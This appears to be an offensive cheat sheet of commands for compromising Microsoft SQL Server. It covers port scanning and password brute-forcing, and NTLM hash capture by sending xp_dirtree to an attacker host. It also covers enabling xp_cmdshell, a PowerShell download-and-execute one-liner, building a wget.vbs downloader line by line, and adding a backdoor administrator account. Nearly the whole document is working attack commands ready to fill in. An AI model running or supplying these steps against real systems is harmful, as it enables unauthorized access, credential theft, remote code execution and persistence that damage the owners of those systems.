`` Scanning
~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password,ms-sql-tables
`` Password Bruteforcing
~$ nmap -p 1433 --script ms-sql-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST
~$ hydra -L VAR_WORDLIST_USER -V -P VAR_WORDLIST_PASSWORD VAR_TARGET_HOST mssql
`` TDS Versions
- 7.0
  - SQL Server 7.0
- 7.1
  - SQL Server 2000
- 7.1 Revision 1
  - SQL Server 2000 SP1
- 7.2
  - SQL Server 2005
- 7.3.A
  - SQL Server 2008
- 7.3.B
  - SQL Server 2008 R2
- 7.4
  - SQL Server 2012
  - SQL Server 2014
  - SQL Server 2016
  - SQL Server 2017
  - SQL Server 2019
`` Remote console
~$ vim ~/.sqshrc
~$ sqsh -S mssql1
`` Capturing NTLM
> EXEC master..xp_dirtree "\\VAR_ATTACKER_HOST\\test";
`` Change sa password
~> net stop MSSQL$SQLEXPRESS
~> net start MSSQL$SQLEXPRESS /m sqlcmd
~> sqlcmd
> ALTER LOGIN [sa] WITH DEFAULT_DATABASE=[master]
> GO
> USE [master]
> GO
> ALTER LOGIN [sa] WITH CHECK_POLICY = OFF;
> GO
> ALTER LOGIN [sa] WITH PASSWORD=N'sa';
> GO
~> net stop MSSQL$SQLEXPRESS
~> net start MSSQL$SQLEXPRESS
`` Linked servers
`` List
> EXEC sp_linkedservers;
`` Execute on linked server
> SELECT version FROM OPENQUERY("VAR_TARGET_HOST", 'SELECT @@version AS version')
`` Remote execution
> EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT VAR_TARGET_HOST
> EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT VAR_TARGET_HOST
> EXEC ('xp_cmdshell ''whoami'';') AT VAR_TARGET_HOST
`` With metasploit
> use auxiliary/admin/mssql/mssql_sql
> set USERNAME VAR_USERNAME
> set PASSWORD VAR_PASSWORD
> set DOMAIN VAR_DOMAIN
> set USE_WINDOWS_AUTHENT yes
> set RHOSTS VAR_TARGET_HOST
> set SQL "EXEC master..xp_dirtree '\\\\VAR_ATTACKER_HOST\\test'"
> run
`` xp_cmdshell
`` The basic approach
> exec sp_configure "show advanced options", 1
> reconfigure
> exec sp_configure "xp_cmdshell", 1
> reconfigure
> xp_cmdshell "whoami"
`` Download and execute PowerShell
> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://VAR_TARGET_HOST/script.ps1\");"
`` wget.vbs
xp_cmdshell 'echo strUrl = WScript.Arguments.Item(0) > wget.vbs'
go
xp_cmdshell 'echo StrFile = WScript.Arguments.Item(1) >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs'
go
xp_cmdshell 'echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs'
go
xp_cmdshell 'echo Err.Clear >> wget.vbs'
go
xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
go
xp_cmdshell 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs'
go
xp_cmdshell 'echo http.Open "GET",strURL,False >> wget.vbs'
go
xp_cmdshell 'echo http.Send >> wget.vbs'
go
xp_cmdshell 'echo varByteArray = http.ResponseBody >> wget.vbs'
go
xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
go
xp_cmdshell 'echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs'
go
xp_cmdshell 'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs'
go
xp_cmdshell 'echo strData = "" >> wget.vbs'
go
xp_cmdshell 'echo strBuffer = "" >> wget.vbs'
go
xp_cmdshell 'echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs'
go
xp_cmdshell 'echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs'
go
xp_cmdshell 'echo Next >> wget.vbs'
go
xp_cmdshell 'echo ts.Close >> wget.vbs'
go
`` Using sqsh
~$ cat ~/.freetds.conf
[mssql1]
host = VAR_TARGET_HOST
port = 27900
tds version = 8.0
~$ sqsh -S mssql1 -U sa
> exec sp_configure "show advanced options", 1
> go
> reconfigure
> go
> exec sp_configure "xp_cmdshell", 1
> go
> reconfigure
> go
> xp_cmdshell "whoami"
> go
> xp_cmdshell "net user VAR_USERNAME VAR_PASSWORD /add"
> xp_cmdshell "net localgroup administrators VAR_USERNAME /add"